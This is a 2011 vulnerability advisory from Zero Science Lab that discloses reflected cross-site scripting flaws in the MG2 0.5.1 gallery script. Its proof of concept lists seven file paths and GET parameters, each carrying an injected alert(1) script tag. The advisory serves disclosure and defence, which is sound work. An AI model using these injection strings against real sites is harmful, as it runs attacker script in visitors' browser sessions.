MG2 0.5.1 Multiple XSS Vulnerabilities

2011-02-12T00:00:00
ID ZSL-2011-4993
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-02-12T00:00:00

Description

Title: MG2 0.5.1 Multiple XSS Vulnerabilities
Advisory ID: ZSL-2011-4993
Type: Remote
Impact: Cross-Site Scripting
Risk: (2/5)
Release Date: 12.02.2011

Summary

MG2 is the sequel to the popular image gallery script MiniGal. One of the highlights of MG2 is, that it supports PHP running in safe mode which is unsupported by almost all other dynamic image gallery scripts on the web.

Description

MG2 suffers from multiple XSS vulns. Several parameters are vulnerable that are not sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Vendor

MiniGal - <http://www.minigal.dk>

Affected Version

0.5.1

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vendor Status

N/A

PoC

mg2_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://securityreason.com/exploitalert/9974>
[2] <http://packetstormsecurity.org/files/98467>
[3] <http://securityreason.com/wlb_show/WLB-2011020060>
[4] <http://www.securityfocus.com/bid/46378>
[5] <http://xforce.iss.net/xforce/xfdb/65452>

Changelog

[12.02.2011] - Initial release
[15.02.2011] - Added reference [2] and [3]
[16.02.2011] - Added reference [4]
[18.02.2011] - Added reference [5]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            ###########################################################
#                                                         #
#        MG2 0.5.1 Multiple XSS Vulnerabilities           #
#                                                         #
#                                                         #
# Vendor: MiniGal                                         #
# Product web page: http://www.minigal.dk                 #
# Affected version: 0.5.1                                 #
#                                                         #
# Summary: MG2 is the sequel to the popular               #
# image gallery script MiniGal. One of the                #
# highlights of MG2 is, that it supports PHP              #
# running in safe mode which is unsupported               #
# by almost all other dynamic image gallery               #
# scripts on the web.                                     #
#                                                         #
# Desc: MG2 suffers from multiple XSS vulns.              #
# Several parameters are vulnerable that are              #
# not sanitized before being returned to the              #
# user. This can be exploited to execute                  #
# arbitrary HTML and script code in a user's              #
# browser session in context of an affected               #
# site.                                                   #
#                                                         #
# Tested on: MS WinXP Pro SP3 (EN), XAMPP                 #
#                                                         #
# Vulnerability discovered by: LiquidWorm                 #
#                                                         #
# Advisory ID: ZSL-2011-4993                              #
#                                                         #
#                                                         #
# 03.02.2011                                              #
#                                                         #
#                                                         #
###########################################################
       |                                          |
       |                                          |
       |                                          |
 .-----0------------------------------------------0-----.
 |                                                      |
 |                                                      |
 | /mg2/skins/rounded/templates/thumbnails_password.php |
 | - param(GET): list=25&lt;script&gt;alert(1)&lt;/script&gt;       |
 | - param(GET): id=25&lt;script&gt;alert(1)&lt;/script&gt;         |
 |                                                      |
 | /mg2/skins/rounded/templates/viewimage_comments.php  |
 | - param(GET): id=31&lt;script&gt;alert(1)&lt;/script&gt;         |
 |                                                      |
 | /mg2/skins/admin/admin1_menu.php                     |
 | - param(GET): list=41&lt;script&gt;alert(1)&lt;/script&gt;       |
 |                                                      |
 | /mg2/skins/admin/admin2_comments.php                 |
 | - param(GET): list=45&lt;script&gt;alert(1)&lt;/script&gt;       |
 |                                                      |
 | /mg2/skins/admin/admin2_edit.php                     |
 | - param(GET): editID=53&lt;script&gt;alert(1)&lt;/script&gt;     |
 |                                                      |
 | /mg2/skins/admin/admin2_newfolder.php                |
 | - param(GET): list=59&lt;script&gt;alert(1)&lt;/script&gt;       |
 |                                                      |
 | /mg2/skins/admin/admin3_folders.php                  |
 | - param(GET): list=71&lt;script&gt;alert(1)&lt;/script&gt;       |
 |                                                      |
 |                                                      |
 *------------------------------------------------------*



                                                        Created by:
                                                        MiniAdvisory Creator v1.0.3g
                                                        2011 © Zero Science Lab